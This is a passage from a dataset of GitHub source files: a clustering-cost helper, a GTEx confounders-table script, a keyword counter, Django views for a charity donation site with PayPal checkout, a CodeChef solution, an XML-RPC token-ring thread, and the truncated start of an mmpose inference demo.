d.min(axis=1), d.argmin(axis=1)\r\n \r\n \r\n # Sum of Within-Cluster Distance\r\n WCD = np.sum(dmin)\r\n \r\n z=WCD\r\n\r\n # Empty dict\r\n out={} \r\n \r\n out[\"d\"] = d\r\n out[\"dmin\"] = dmin\r\n out[\"ind\"] = ind\r\n out[\"WCD\"] = WCD \r\n \r\n del d,X,m,dmin,ind,WCD \r\n \r\n return z,out\r\n","repo_name":"blueeyedwhitewolf/Projects","sub_path":"Machine Learning/projeto verao/PythonWorks/LNDeterctor_NoduleSegmentation/ClusteringCost.py","file_name":"ClusteringCost.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32119561170","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor: Andrew Hamel\nDate: 27 March 2019\n\nPython3 script to parse .allpairs.txt.gz files in GTEx to create confounders table to run in QTLEnrich.\n\nRequires at least pandas release 0.24\n\nArguments:\n 1. Directory\n 2. file_extension (files in the directory to be parsed e.g. .allpairs.txt.gz)\n 3. Variant_List (unique list of all variants)\n 4. LD_Proxy (file containing variants and the number of LD proxy variants)\n 5. Output_File (name of file created with path. If path not included, defaults to current working directory.)\n\nReturns:\n 1. Confounders table\n\nConfounder Table format:\n Headers\n A. variant (variant_id in the form chrN_pos_ref_alt_b38)\n B. LD_proxy (number of LD proxy variants for a given variant)\n C. MAF_Tissue (For each tissue-variant pair, minor allele frequency is indicated)\n D. 
TSS_Tissue (For each tissue-variant pair, nearest TSS distance is chosen)\n\n\n\"\"\"\n\nimport os\nimport os.path\nimport argparse\nimport re\nimport pandas as pd\nimport numpy as np\n\ndef Format_GENCODE_File(GENCODE):\n \"\"\"\n Prepare GENCODE File to merge with retina eQTL file\n \"\"\"\n GENCODE_df = pd.read_csv(GENCODE,sep='\\t')\n\n #select genes\n GENCODE_df_gene = GENCODE_df.loc[GENCODE_df['feature'] == 'gene'].copy()\n\n #extract relevant columns\n GENCODE_df_gene = GENCODE_df_gene[['gene_id','start','end','strand']]\n GENCODE_df_gene = GENCODE_df_gene.rename(columns = {'start':'gene_start','end':'gene_end'})\n\n return GENCODE_df_gene\n\ndef Merge_GENCODE_QTL(variant_df,gencode):\n \"\"\"\n Merge GENCODE file and eQTL file on ensembl gene_id\n \"\"\"\n print('merging')\n Merged_File = pd.merge(variant_df,gencode,on=['gene_id'])\n return Merged_File\n\ndef Compute_TSS_Distance(variant_df,gencode):\n \"\"\"\n compute tss distance\n\n if strand is positive:\n tss distance = start of variant -- start of gene\n if strand is negative:\n tss distance = (start of variant -- end of gene)*(-1)\n \"\"\"\n GENCODE_QTL = Merge_GENCODE_QTL(variant_df,gencode)\n print('computing TSS_Distance')\n\n #compute TSS Distance for positive and negative strands separately\n #append back together\n GENCODE_QTL_pos_strand = GENCODE_QTL.loc[GENCODE_QTL['strand'] == '+'].copy()\n GENCODE_QTL_neg_strand = GENCODE_QTL.loc[GENCODE_QTL['strand'] == '-'].copy()\n\n GENCODE_QTL_pos_strand['TSS_Distance'] = GENCODE_QTL_pos_strand['pos'] - GENCODE_QTL_pos_strand['gene_start']\n GENCODE_QTL_neg_strand['TSS_Distance'] = (GENCODE_QTL_neg_strand['pos'] - GENCODE_QTL_neg_strand['gene_end'])*(-1)\n\n GENCODE_QTL_Full = GENCODE_QTL_pos_strand.append(GENCODE_QTL_neg_strand)\n GENCODE_QTL_Full = GENCODE_QTL_Full.drop(['gene_start','gene_end','strand'],axis=1)\n\n return GENCODE_QTL_Full\n\ndef Parse_QTL_File(QTL_File,QTL_Directory,Tissue,gencode):\n \"\"\"\n Parses QTLs\n\n 1. Removes rows with MAF=0\n 2. If strand < 0: multiply TSS*-1\n 3. Sorts by absolute value of TSS distance\n 4. Removes duplicates, selecting rows with smallest TSS distance\n 5. 
Renames columns in form: variant,MAF_Tissue,TSS_Tissue \n \"\"\"\n QTL = pd.read_csv(QTL_Directory+QTL_File,sep='\\t',usecols=['variant_id','gene_id','maf'])\n\n #remove rows with maf=0\n QTL = QTL.loc[QTL['maf'] != 0.0]\n\n #extract variant position from variant_id\n QTL['pos'] = QTL['variant_id'].str.split('_',2).str[1].astype(int)\n\n #computing tss distance\n QTL_computed_tss_distance = Compute_TSS_Distance(QTL,gencode)\n\n del QTL\n\n #create column of absolute value of tss_distance\n #sort by abs value, ascending\n QTL_computed_tss_distance['Abs_tss_distance'] = QTL_computed_tss_distance['TSS_Distance'].abs()\n QTL_computed_tss_distance = QTL_computed_tss_distance.sort_values(by=['Abs_tss_distance'],ascending=True)\n\n #drop duplicates\n #keep smallest tss_distance\n QTL_computed_tss_distance = QTL_computed_tss_distance.drop_duplicates(subset=['variant_id'],keep='first')\n print('length after removing duplicates:',len(QTL_computed_tss_distance))\n #rename columns\n #drop Abs_Tss column\n QTL_computed_tss_distance = QTL_computed_tss_distance.rename(columns={'variant_id':'variant','TSS_Distance':'TSS_'+Tissue,'maf':'MAF_'+Tissue})\n QTL_computed_tss_distance = QTL_computed_tss_distance.drop(['Abs_tss_distance','gene_id','pos'],axis=1)\n QTL_computed_tss_distance['MAF_'+Tissue] = QTL_computed_tss_distance['MAF_'+Tissue].round(decimals=5)\n\n return QTL_computed_tss_distance\n\ndef parse_args():\n \"\"\"\n Arguments passed to generate confounders table\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Generate confounders table to be used on QTLEnrich\")\n parser.add_argument('-D','--QTL_Directory',type=str,help='Directory containing QTL files to parse',required=True)\n parser.add_argument('-F','--File_Extension',type=str,help='File extension used to select files in QTL directory',required=True)\n parser.add_argument('-V','--Variants_List',type=str,help='Unique list of all variants',required=True)\n parser.add_argument('-L','--LD_Proxy',type=str,help='File containing number of LD proxy variants',required=True)\n parser.add_argument('-G','--GENCODE_File',type=str,help='GENCODE file to extract strand orientation',required=True)\n parser.add_argument('-O','--Output_File',type=str,help='Name of generated file',required=True)\n\n return parser.parse_args()\n\nif __name__ == '__main__':\n\n args = parse_args()\n\n print('parsing gencode')\n gencode = Format_GENCODE_File(args.GENCODE_File)\n\n #select files to parse\n QTL_Files = [x for x in os.listdir(args.QTL_Directory) if x.endswith(args.File_Extension)]\n\n #read unique variants file\n #denoted as confounders table\n Confounders_Table_df = pd.read_csv(args.Variants_List,sep='\\t') \n Confounders_Table_df = Confounders_Table_df.drop_duplicates()\n\n #Merge with LD Proxy file\n LD_Proxy_df = pd.read_csv(args.LD_Proxy,sep='\\t')\n Confounders_Table_df = pd.merge(Confounders_Table_df,LD_Proxy_df,on=['variant'],how='outer')\n\n print('length of confounders table before merging:',len(Confounders_Table_df))\n\n #parse files\n for Count,QTL_File in enumerate(QTL_Files,1):\n print(Count,QTL_File)\n\n #Extract tissue name\n tissue=re.sub(args.File_Extension,'',QTL_File)\n\n #parse file\n #merge with preexisting table\n df = Parse_QTL_File(QTL_File,args.QTL_Directory,tissue,gencode)\n Confounders_Table_df = pd.merge(Confounders_Table_df,df,on=['variant'],how='outer')\n print('length after merging:',len(Confounders_Table_df))\n\n #write to file\n Confounders_Table_df.to_csv(args.Output_File,sep='\\t',header=True,index=None,compression='gzip')\n \n 
\n","repo_name":"segrelabgenomics/QTLEnrich","sub_path":"src/Generate_Confounders_Table.py","file_name":"Generate_Confounders_Table.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"1839933936","text":"class WordCounter:\r\n \"\"\"Class for counting occurrences of specified keywords in given text\"\"\"\r\n\r\n def __init__(self, text=None, keywords=None):\r\n \"\"\"Construct a word counter\r\n\r\n text - text to analyse (defaults to '')\r\n keywords - words to search and count inside text, separated by commas (defaults to '')\r\n \"\"\"\r\n self._text = ''\r\n self._keywords = ''\r\n\r\n self.text = text\r\n self.keywords = keywords\r\n\r\n def count(self):\r\n \"\"\"Count keywords in specified text\r\n\r\n Return dictionary of keywords with counted occurrences\"\"\"\r\n statistics = {}\r\n\r\n if len(self._text) > 0 and len(self._keywords) > 0:\r\n statistics = dict((kw.strip(), 0) for kw in self._keywords.split(','))\r\n for s in statistics:\r\n statistics[s] = self._text.lower().count(s.lower())\r\n\r\n return statistics\r\n\r\n @property\r\n def text(self):\r\n \"\"\"Return the text intended to analyse\"\"\"\r\n return self._text\r\n\r\n @text.setter\r\n def text(self, text):\r\n \"\"\"Set the text to analyse\"\"\"\r\n if isinstance(text, str):\r\n self._text = text\r\n else:\r\n self._text = ''\r\n\r\n @property\r\n def keywords(self):\r\n \"\"\"Return the keywords intended to search inside the text\"\"\"\r\n return self._keywords\r\n\r\n @keywords.setter\r\n def keywords(self, keywords):\r\n \"\"\"Set the keywords to search inside the text\"\"\"\r\n if isinstance(keywords, str):\r\n self._keywords = keywords\r\n else:\r\n self._keywords = ''\r\n","repo_name":"lukwlw/keywords_counter","sub_path":"keywords/tools/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43130166945","text":"# REFERENCES\n# Title: Simple Ecommerce\n# Author: overiq\n# Date Published: Dec 8, 2018\n# Date Accessed: Oct 18, 2020\n# Code version: commit 704596f\n# URL: https://github.com/overiq/simple_ecommerce\n# Software License: MIT License\n\nfrom django.shortcuts import render, HttpResponse, redirect, get_object_or_404, reverse\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.template.defaultfilters import slugify\nfrom decimal import Decimal\nfrom paypal.standard.forms import PayPalPaymentsForm\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import CharityOrg, Cause, Order, LineItem, User\nfrom .forms import CartForm, CheckoutForm, CharityForm, CauseForm, DeleteForm, CharitySearchForm, BasicSearchForm\nfrom . 
import cart\nfrom taggit.models import Tag\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login as auth_login, logout as django_logout\nfrom .forms import SignupForm # used by signup() below; assumed to be defined alongside the other forms\nfrom django.db.models import Count\nfrom django.template import RequestContext\n\n# Create your views here.\n# Test\n\ndef index(request):\n return render(request, 'microDonation/index.html', {})\n\ndef not_authorized(request):\n return render(request, 'microDonation/login.html', {})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(request, email=user.email, password=raw_password)\n if user is not None:\n # use the auth login, not the login view defined below\n auth_login(request, user)\n else:\n print(\"user is not authenticated\")\n return redirect('microDonation/')\n else:\n form = SignupForm()\n return render(request, 'microDonation/login.html', {'form': form})\n\ndef about(request):\n return render(request, 'microDonation/about.html', {})\n\ndef login(request):\n return render(request, 'microDonation/login.html', {'all_charities': CharityOrg.objects.filter(is_deleted = False)})\n\n\n\n@login_required\ndef logout(request):\n django_logout(request)\n return render(request, 'microDonation/login.html')\n\n# hey bradley, am I correctly passing in the list of charities?\ndef charities(request):\n return render(request,'microDonation/charities.html', {'all_charities': CharityOrg.objects.filter(is_deleted = False)}\n)\n\ndef show_charity(request, charity_id):\n charityOrg = get_object_or_404(CharityOrg, id=charity_id)\n charity_causes = Cause.objects.filter(charity=charityOrg.pk).filter(is_deleted=False)\n charity_orders = charityOrg.charity_orders.all()\n charity_dict = {}\n for o in charity_orders:\n charity_dict[o] = o.charity_cost(charityOrg)\n print(\"charity orders\")\n print(charity_orders)\n if charityOrg.is_deleted:\n return redirect('charities')\n else:\n return render(request, 'microDonation/charity_detail.html', {'charity': charityOrg,\n 'causes': charity_causes,\n 'orders': charity_dict,\n })\n\n@login_required\ndef create_charity(request):\n if request.method == 'POST':\n form = CharityForm(request.POST, request.FILES)\n print(form['authorized_users'], flush=True)\n if form.is_valid():\n authorized_users = form.cleaned_data.get('authorized_users').split(',')\n authenticated_users = []\n for user in authorized_users:\n if User.objects.filter(email=user).exists():\n authenticated_users.append(User.objects.get(email=user))\n if authenticated_users == []:\n authenticated_users.append(request.user)\n newCharity = form.save(commit=False)\n newCharity.slug = slugify(newCharity.name)\n newCharity.save()\n form.save_m2m()\n newCharity.authenticated_users.set(authenticated_users)\n newCharity.save()\n return redirect('charities')\n form = CharityForm(initial={'authorized_users': request.user.email})\n return render(request, 'microDonation/create_charity.html', {\n 'form': form\n })\n\n@login_required\ndef update_charity(request, charity_id):\n charityorg = CharityOrg.objects.get(id=charity_id)\n if charityorg.is_deleted:\n return redirect('charities')\n if charityorg.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n updateform = CharityForm(request.POST, request.FILES, instance=charityorg)\n if updateform.is_valid():\n authorized_users = updateform.cleaned_data.get('authorized_users').split(',')\n authenticated_users = []\n for user in authorized_users:\n if 
User.objects.filter(email=user).exists():\n authenticated_users.append(User.objects.get(email=user))\n if authenticated_users == []:\n authenticated_users.append(request.user)\n charityorg = updateform.save(commit=False)\n charityorg.slug = slugify(charityorg.name)\n charityorg.save()\n updateform.save_m2m()\n charityorg.authenticated_users.set(authenticated_users)\n charityorg.save()\n return redirect('charities')\n else:\n authenticated_users = charityorg.authenticated_users.all()\n authorized_users = \"\"\n for user in authenticated_users:\n authorized_users = authorized_users + user.email + \",\"\n form = CharityForm(initial={'authorized_users': authorized_users},instance=charityorg)\n return render(request, 'microDonation/update_charity.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef delete_charity(request, charity_id):\n charityorg = CharityOrg.objects.get(id=charity_id)\n if charityorg.is_deleted:\n return redirect('charities')\n if charityorg.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n deleteform = DeleteForm(request.POST)\n if deleteform.is_valid():\n print(\"Form is valid!\")\n charityorg.is_deleted = deleteform.cleaned_data['delete']\n charityorg.save()\n else:\n print(\"Form is invalid!\")\n print(deleteform.errors)\n return redirect('charities')\n else:\n form = DeleteForm()\n return render(request, 'microDonation/delete_charity.html', {\n 'form': form,\n 'charity': charityorg,\n })\n else:\n return redirect('not_authorized')\n\ndef show_cause(request, cause_id):\n cause = get_object_or_404(Cause, id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if request.method == 'POST':\n cartform = CartForm(request, request.POST)\n if cartform.is_valid():\n request.form_data = cartform.cleaned_data\n cart.add_item_to_cart(request)\n return redirect('show_cart')\n\n form = CartForm(request, initial={'cause_id': cause.id})\n return render(request, 'microDonation/cause_detail.html', {\n 'cause': cause,\n 'form': form,\n })\n\n@login_required\ndef create_cause(request, charity_id):\n charity = get_object_or_404(CharityOrg, id=charity_id)\n if charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n form = CauseForm(request.POST, request.FILES)\n if form.is_valid():\n newCause = form.save(commit=False)\n newCause.slug = slugify(newCause.name)\n newCause.charity = charity\n newCause.save()\n form.save_m2m()\n return redirect('show_charity', charity.pk)\n form = CauseForm(data={'charity':charity})\n return render(request, 'microDonation/create_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef update_cause(request, cause_id):\n cause = Cause.objects.get(id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if cause.charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n updateform = CauseForm(request.POST, request.FILES, instance=cause)\n if updateform.is_valid():\n cause = updateform.save(commit=False)\n cause.slug = slugify(cause.name)\n cause.save()\n updateform.save_m2m()\n return redirect('show_charity', cause.charity.pk)\n else:\n form = CauseForm(instance=cause)\n return render(request, 'microDonation/update_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\n@login_required\ndef delete_cause(request, cause_id):\n cause = 
Cause.objects.get(id=cause_id)\n if cause.is_deleted:\n return redirect('show_charity', cause.charity.pk)\n if cause.charity.authenticated_users.filter(id=request.user.id).exists():\n if request.method == 'POST':\n deleteform = DeleteForm(request.POST)\n if deleteform.is_valid():\n print(\"Form is valid!\")\n cause.is_deleted = deleteform.cleaned_data['delete']\n cause.save()\n else:\n print(\"Form is invalid!\")\n print(deleteform.errors)\n return redirect('show_charity', cause.charity.pk)\n else:\n form = DeleteForm()\n return render(request, 'microDonation/delete_cause.html', {\n 'form': form,\n })\n else:\n return redirect('not_authorized')\n\ndef show_cart(request):\n print(\"attempting to show cart \", flush=True)\n if request.method == 'POST':\n if request.POST.get('submit') == 'Update':\n cart.update_item(request)\n if request.POST.get('submit') == 'Remove':\n cart.remove_item(request)\n cart_items = cart.get_all_cart_items(request)\n cart_subtotal = cart.subtotal(request)\n print(\"attempting to render page \", flush=True)\n return render(request, 'microDonation/cart.html', {'cart_items': cart_items,\n 'cart_subtotal': cart_subtotal,\n })\n\ndef search_charity(request):\n form = CharitySearchForm()\n results = []\n if request.method == 'POST':\n form = BasicSearchForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n cForm = CharitySearchForm({'search_type': 'name', 'search_value': form.cleaned_data.get(\"search_val\")})\n results = list(CharityOrg.objects.filter(name__icontains=data.get('search_val')).filter(is_deleted = False))\n return render(request, 'microDonation/charity_search.html', {'form': cForm, 'results': results})\n form = CharitySearchForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n if data.get('search_type') == 'name':\n results = list(CharityOrg.objects.filter(name__icontains=data.get('search_value')).filter(is_deleted = False))\n elif data.get('search_type') == 'min_causes':\n min_value = data.get('search_value')\n obj_to_count = CharityOrg.objects.annotate(Count('cause'))\n for i in range(len(obj_to_count)):\n if obj_to_count[i].cause__count >= int(min_value):\n charity = CharityOrg.objects.get(id=obj_to_count[i].id)\n if getattr(charity, 'is_deleted') == False:\n results.append(charity)\n elif data.get('search_type') == 'tags':\n tags = [tag.strip() for tag in data.get('search_value').split(',')]\n results = CharityOrg.objects.filter(tags__name__in=tags).filter(is_deleted = False).distinct()\n else:\n print(\"search type is invalid\")\n pass\n else:\n print(\"form is not valid\")\n return render(request, 'microDonation/charity_search.html', {\n 'form': form,\n 'results': results,\n })\n\ndef _generate_order_id(): # Creates a random 10-character-long string\n import string, random # Although extremely unlikely, it does check for duplicates\n while True:\n # build the full 10-character ID; the old str.join call kept only the last character\n orderID = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(10))\n if Order.objects.filter(order_id=orderID).count() == 0:\n return orderID\n\ndef process_payment(request):\n order_id = request.session.get('order_id')\n print(\"ORDER ID\")\n print(order_id)\n order = get_object_or_404(Order, id=order_id)\n host = request.get_host()\n\n paypal_dict = {\n \n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '%.2f' % Decimal(order.total_cost()).quantize(\n Decimal('.01')),\n 'item_name': 'Order {}'.format(order.order_id),\n 'invoice': str(order.order_id),\n 'currency_code': 'USD',\n 'notify_url': 
'http://{}{}'.format(host,\n reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host,\n reverse('payment_done')),\n 'cancel_return': 'http://{}{}'.format(host,\n reverse('payment_cancelled')),\n }\n\n form = PayPalPaymentsForm(initial=paypal_dict)\n return render(request, 'microDonation/process_payment.html', {'order': order, 'form': form})\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'microDonation/payment_done.html')\n\n@csrf_exempt\ndef payment_cancelled(request):\n return render(request, 'microDonation/payment_cancelled.html')\n\ndef checkout(request):\n cart_subtotal = cart.subtotal(request)\n all_items = cart.get_all_cart_items(request)\n if request.method == 'POST':\n form = CheckoutForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n order_charities = set()\n for cart_item in all_items:\n order_charities.add(CharityOrg.objects.get(id=Cause.objects.get(id=cart_item.cause_id).charity.id))\n o = form.save(commit=False)\n o.save()\n form.save_m2m()\n o.charities.set(list(order_charities))\n o.save()\n \n for cart_item in all_items:\n li = LineItem(\n cause_id = cart_item.cause_id,\n value = cart_item.value,\n order_id = o.id\n )\n li.save()\n\n cart.clear(request)\n request.session['order_id'] = o.id\n print(\"ORDER ID 1\")\n print(request.session['order_id'])\n return redirect('process_payment')\n else:\n form = CheckoutForm()\n return render(request, 'microDonation/checkout.html', locals())\n","repo_name":"jk4as/Microdonation","sub_path":"microDonation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22990952083","text":"for i in range(int(input())):\n n,a,b=map(int,input().split())\n cts=0\n cta=0\n string = list(\"EQUINOX\")\n for j in range(n):\n x=list(input())\n if x[0] in string:\n cts+=a\n else:\n cta+=b\n if(cts>cta):\n print(\"SARTHAK\")\n elif(cta>cts):\n print(\"ANURADHA\")\n else:\n print(\"DRAW\")\n","repo_name":"prathamesh1301/Codechef-Solutions","sub_path":"Equinox Strings.py","file_name":"Equinox Strings.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74624121393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport threading\nimport time\nimport logging\nimport xmlrpclib\nimport Queue\n\nclass TokenRing(threading.Thread):\n\n\tdef __init__(self, myaddress, peers, req_q, res_q):\n\t\t\"\"\"Peers is the connected clients dictionary\"\"\"\n\t\tthreading.Thread.__init__(self)\n\t\tself.log = logging.getLogger(self.__class__.__name__)\n\t\tself.daemon = True\n\t\tself.kill_received = False\n\t\tself.myaddress = myaddress\n\t\tself.peers = peers\n\t\tself.wait_time = 1\n\t\tself.token = False\n\t\tself.commands = req_q\n\t\tself.results = res_q\n\t\tself.signin_q = Queue.Queue()\n\n\tdef run(self):\n\t\tself.log.debug('Starting TokenRing Thread with token: %s', str(self.token))\n\t\twhile not self.kill_received:\n\t\t\tif self.token:\n\t\t\t\t#self.log.debug('Proxy is mine')\n\t\t\t\t#next_address = self.next_peer()\n\t\t\t\t#self.log.debug('Next peer is %s', next_address)\n\t\t\t\tself.consume_command_queue()\n\t\t\t\tself.consume_signin_queue()\n\t\t\t\ttime.sleep(self.wait_time)\n\t\t\t\t#self.log.debug('Peers : %s', str(self.peers))\n\t\t\t\tif len(self.peers) > 1:\n\t\t\t\t\tself.token = 
False\n\t\t\t\t\tself.forward_token()\n\t\t\telse:\n\t\t\t\ttime.sleep(self.wait_time)\n\t\tself.log.debug('Token ring thread is terminating')\n\n\tdef consume_signin_queue(self):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\taddress = self.signin_q.get(block=False)\n\t\t\texcept Queue.Empty:\n\t\t\t\tbreak\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.exception(str(e))\n\t\t\telse:\n\t\t\t\tself.log.debug('Got address %s from signin queue', str(address))\n\t\t\t\tproxy = self.create_proxy(address)\n\t\t\t\tproxy.handler1.signInApproved(self.myaddress)\n\t\t\t\tself.log.debug('Executed signInApproved from %s', address)\n\n\tdef consume_command_queue(self):\n\t\ttry:\n\t\t\tcommand = self.commands.get(block=False)\n\t\texcept Queue.Empty:\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\tself.log.exception(str(e))\n\t\telse:\n\t\t\tif not isinstance(command, basestring):\n\t\t\t\tself.log.debug('RECEIVED %d', len(command))\n\t\t\t\tto_execute = []\n\t\t\t\tfor item in command:\n\t\t\t\t\tp, command_dict = item\n\t\t\t\t\tself.log.debug('Executing for proxy: %s', repr(p))\n\t\t\t\t\tself.log.debug(str(command_dict))\n\t\t\t\t\twhile command_dict:\n\t\t\t\t\t\tfunc_name, args = command_dict.popitem(False)\n\t\t\t\t\t\tfunc = getattr(p, func_name)\n\t\t\t\t\t\tto_execute.append((func, args))\n\t\t\t\t\t\tself.log.debug('Added %s for execution', func_name)\n\t\t\t\tres = [f(*a) for f, a in to_execute]\n\t\t\t\tself.results.put(res)\n\t\t\t\tself.commands.task_done()\n\t\t\telif command == 'PAUSE':\n\t\t\t\tself.log.debug('Received PAUSE command')\n\t\t\t\tself.results.put('OK')\n\t\t\t\tself.commands.task_done()\n\t\t\t\trelease = self.commands.get(block=True)\n\t\t\t\tif release != 'RELEASE':\n\t\t\t\t\tself.log.critical('After pause you should send RELEASE')\n\t\t\t\telse:\n\t\t\t\t\tself.log.debug('Releasing token')\n\t\t\t\t\tself.results.put('OK')\n\t\t\t\tself.commands.task_done()\n\n\n\tdef forward_token(self, next_address=None):\n\t\tif not next_address:\n\t\t\tnext_address = self.next_peer()\n\t\tif next_address:\n\t\t\t#self.log.debug('We should forward the token to next: %s',\n\t\t\t#\tnext_address)\n\t\t\tproxy = self.create_proxy(next_address)\n\t\t\ttry:\n\t\t\t\tproxy.handler1.tokenReceived(self.myaddress)\n\t\t\texcept Exception as e:\n\t\t\t\tself.log.exception(str(e))\n\t\telse:\n\t\t\tself.log.debug('Nothing to forward')\n\n\tdef create_proxy(self, address):\n\t\t#self.log.debug('Creating proxy for %s', address)\n\t\ttarget_list = address.split(':')\n\t\thost, port = target_list[0], int(target_list[1])\n\t\turl = 'http://%s:%d' % (host, port)\n\t\tproxy = xmlrpclib.ServerProxy(url,allow_none=True)\n\t\treturn proxy\n\n\tdef next_peer(self):\n\t\t\"\"\"returns the address of the next peer\"\"\"\n\t\taddresses = self.peers.keys()\n\t\tnext_i = (addresses.index(self.myaddress)+1)%len(addresses)\n\t\ttry:\n\t\t\tnxt_ad = addresses[next_i]\n\t\texcept IndexError:\n\t\t\tnxt_ad = None\n\t\treturn nxt_ad\n\n\n\n","repo_name":"gosom/netcal","sub_path":"netcal/client/token_ring.py","file_name":"token_ring.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6962630216","text":"import mimetypes\nimport os\nimport tempfile\nfrom argparse import ArgumentParser\n\nimport json_tricks as json\nimport mmcv\nimport mmengine\n\nfrom mmpose.apis import inference_bottomup, init_model\nfrom mmpose.registry import VISUALIZERS\nfrom mmpose.structures import split_instances\n\n\ndef process_one_image(args, 
img_path, pose_estimator, visualizer,\n show_interval):\n \"\"\"Visualize predicted keypoints (and heatmaps) of one image.\"\"\"\n\n # inference a single image\n batch_results = inference_bottomup(pose_estimator, img_path)\n results = batch_results[0]\n\n # show the results\n img = mmcv.imread(img_path, channel_order='rgb')\n\n out_file = None\n if args.output_root:\n out_file = f'{args.output_root}/{os.path.basename(img_path)}'\n\n visualizer.add_datasample(\n 'result',\n img,\n data_sample=results,\n draw_gt=False,\n draw_bbox=False,\n draw_heatmap=args.draw_heatmap,\n show_kpt_idx=args.show_kpt_idx,\n show=args.show,\n wait_time=show_interval,\n out_file=out_file,\n kpt_score_thr=args.kpt_thr)\n\n return results.pred_instances\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('config', help='Config file')\n parser.add_argument('checkpoint', help='Checkpoint file')\n parser.add_argument(\n '--input', type=str, default='', help='Image/Video file')\n parser.add_argument(\n '--show',\n action='store_true',\n default=False,\n help='whether to show img')\n parser.add_argument(\n '--output-root',\n type=str,\n default='',\n help='root of the output img file. '\n 'Default not saving the visualization images.')\n parser.add_argument(\n '--save-predictions',\n action='store_true',\n default=False,\n help='whether to save predicted results')\n parser.add_argument(\n '--device', default='cuda:0', help='Device used for inference')\n parser.add_argument(\n '--draw-heatmap',\n action='store_true',\n help='Visualize the predicted heatmap')\n parser.add_argument(\n '--show-kpt-idx',\n action='store_true',\n default=False,\n help='Whether to show the index of keypoints')\n parser.add_argument(\n '--kpt-thr', type=float, default=0.3, help='Keypoint score threshold')\n parser.add_argument(\n '--radius',\n type=int,\n default=3,\n help='Keypoint radius for visualization')\n parser.add_argument(\n '--thickness',\n type=int,\n default=1,\n help='Link thickness for visualization')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n assert args.show or (args.output_root != '')\n assert args.input != ''\n if args.output_root:\n mmengine.mkdir_or_exist(args.output_root)\n if args.save_predictions:\n assert args.output_root != ''\n args.pred_save_path = f'{args.output_root}/results_' \\\n f'{os.path.splitext(os.path.basename(args.input))[0]}.json'\n\n # build the model from a config file and a checkpoint file\n if args.draw_heatmap:\n cfg_options = dict(model=dict(test_cfg=dict(output_heatmaps=True)))\n else:\n cfg_options = None\n\n model = init_model(\n args.config,\n args.checkpoint,\n device=args.device,\n cfg_options=cfg_options)\n\n # init visualizer\n model.cfg.visualizer.radius = args.radius\n model.cfg.visualizer.line_width = args.thickness\n visualizer = VISUALIZERS.build(model.cfg.visualizer)\n visualizer.set_dataset_meta(model.dataset_meta)\n\n input_type = mimetypes.guess_type(args.input)[0].split('/')[0]\n if input_type == 'image':\n pred_instances = process_one_image(\n args, args.input, model, visualizer, show_interval=0)\n pred_instances_list = split_instances(pred_instances)\n\n elif input_type == 'video':\n tmp_folder = tempfile.TemporaryDirectory()\n video = mmcv.VideoReader(args.input)\n progressbar = mmengine.ProgressBar(len(video))\n video.cvt2frames(tmp_folder.name, show_progress=False)\n output_root = args.output_root\n args.output_root = tmp_folder.name\n pred_instances_list = []\n\n for frame_id, img_fname in 
